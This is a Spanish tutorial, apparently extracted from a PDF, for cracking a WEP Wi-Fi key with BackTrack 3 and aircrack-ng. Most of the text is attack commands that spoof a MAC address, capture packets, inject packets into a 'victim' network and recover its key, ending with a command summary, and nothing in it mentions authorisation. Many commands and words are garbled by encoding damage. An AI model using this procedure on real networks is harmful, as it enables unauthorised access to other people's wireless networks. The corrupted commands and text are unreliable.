manual de backtrack 3

8/17/2019 Manual de BackTrack 3

1/7

MANUAL DE BACKTRACK 3

PASO 1:

Abrimos una consola e ingresamos;

Iwconfig

Con este comando podremos saber cuál es nuestra interfaz wifi, en mi caso es ath0

como pueden ver en la imagen pero puede ser distinta para ustedes solo es cosa de que

la ubiquen, (si no te reconoce ninguna interfaz compatible no podrás seguir)

PASO 2:

despus procederemos a detenerla con el comando

C!digo"

airmonng !"o# a"$%


2/7

PASO 3:

#espus apagamos wifi0 de la siguiente manera

C!digo"

ifconfig wifi% &own

$ara facilitarnos el traba%o de estar memorizando la &ac Adress o simplemente por

seguridad la cambiaremos con el siguiente comando

C!digo"

macc$ang'r m %%:11:22:33:((:)) a"$%


3/7

PASO (:

Ahora pasamos a lo interesante poniendo nuestra tar%eta de red en modo monitor con el

comando

C!digo"

airmonng !"ar" wifi%

PASO ):

#e estar todo correcto nuestra tar%eta estará en modo de monitor que es como nos

permitirá capturar paquetes'

#espus de esto veremos las redes que tenemos disponibles, ingresaremos lo siguiente

C!digo"

airo&*m#ng w r'&'! a"$%


4/7

Con esto le estamos

diciendo al airodump que deberá de escribir (w rite) un archivo llamado redes todo lo

que capture con la interfaz ath0; con este comando escaneara los ** canales en busca de

redes inalámbricas pero si deseamos restringirlo a un solo canal podemos usar elsiguiente comando

C!digo"

airo&*m#ng w r'&'! c$ann'+ 1 a"$%

Con esto le indicamos que solo va a escanear el canal *, recuerden que esto es un

e%emplo ustedes deben de poner el canal que deseen, al momento de in+ectar paquetes

es mu+ til restringir la captura al canal de nuestra victima para asi no desperdiciar

tiempo en los otros *0 canales'

-a+ otra opci!n para indicarle que utilice la e.tensi!n /1 en vez de CA$ que es la queusa por defecto para el archivo de captura, muchos dicen que con este tipo de archivo es

más rápido el crac2eo solo ha+ que agregar ivs + quedará de la siguiente manera

C!digo"

airo&*m#ng i,! w r'&'! c$ann'+ 1 a"$%

PASO -:

3na vez que hemos ingresado nuestro comando correctamente nos aparecerá una

pantalla como esta

Aqu4 esta escaneando todos los canales pero como del que deseo e.traer la contrase5a

esta en el canal * +o utilizare el comando anterior, aqu4 pueden ver que solo esto+

escaneando el canal *, de%amos esta consola as4 tal como está + abrimos una nueva para

ingresar el siguiente comando

C!digo"

air'#+a.ng 1 % ' ESSID a BSSID $ %%:11:22:33:((:)) a"$%

Aqu4 lo que deberán modificar es /C6/&A es el 11/# o nombre de la red de la que

desean conseguir la clave 7$, despus la &ac adress (811/#) de la v4ctima + por

ltimo la nuestra' 7n dado caso que el 11/# tenga más de una palabra ingresaremos el

comando de la siguiente manera"


5/7

C!digo"

air'#+a.ng 1 % ' r'&/&'/in"'rn'" a %%:(E:30:(:03:( $ %%:11:22:33:((:)) a"$%

9!tese como se utilizan diagonales en vez de espacios

1i hacemos todo correctamente nos aparecerá un mensa%e como este

PASO :

1i todo va bien hasta aqu4 comenzaremos con la in+ecci!n de paquetes con el comando

C!digo"

air'#+a.ng 3 BSSID $ %%:11:22:33:((:)) a"$%


6/7

$odremos ver en nuestra consola anterior el progreso de la captura de paquetes en la

secci!n :#ata que es la que nos interesa que %unte mas de 000 paquetes para conseguir

la clave, el proceso puede variar mucho dependiendo de la calidad de la se5al + la

distancia de nuestra victima as4 como otros factores mas, pero debemos de ser pacientes

en algunos casos mientras que en otros será todo mu+ rápido'

PASO 4:

#espues de haber %untado suficientes paquetes abrimos una nueva consola e ingresamos

el siguiente comando

C!digo"

aircrac5ng r'&'!%16ca#

Asi es el comando por defecto pero si nuestra victima es un indicandole que la clave es de >0 bits + asi acelerar el proceso

C!digo"

aircrac2ng n => redes0*'cap

? si creemos que pudieran ser nicamente nmeros solo agregaremos t al comando

C!digo"

aircrac2ng n => @t redes0*'cap

1i ustedes utilizaron la e.tensi!n por defecto solo deben de cambiar ivs por cap + listo a

esperar a que encuentre la llave, an algunas ocasiones nos pedirá que capturemos

primero más paquetes pero si corremos con suerte + hemos capturado los suficientes

tendremos la clave en unos instantes'

7sta es nuestra clave, sin los puntos claro'


7/7

$ues hasta aqu4 llega esta gu4a, espero que sea de utilidad a cada uno de ustedes, solo les

pido que si la publican en otras páginas respeten la autor4a as4 como los

agradecimientos'

R'!*m'n &' coman&o!

iwconfig

airmonng stop ath0

ifconfig wifi0 down

macchanger m 00"**"" ath0

airmonng start wifi0

airodumpng w redes ath0

airepla+ng * 0 e /C6/&A a 811/# h 00"**"" ath0

airepla+ng b 811/# h 00"**"" ath0

aircrac2ng redes0*'cap

manual de backtrack 3

Documents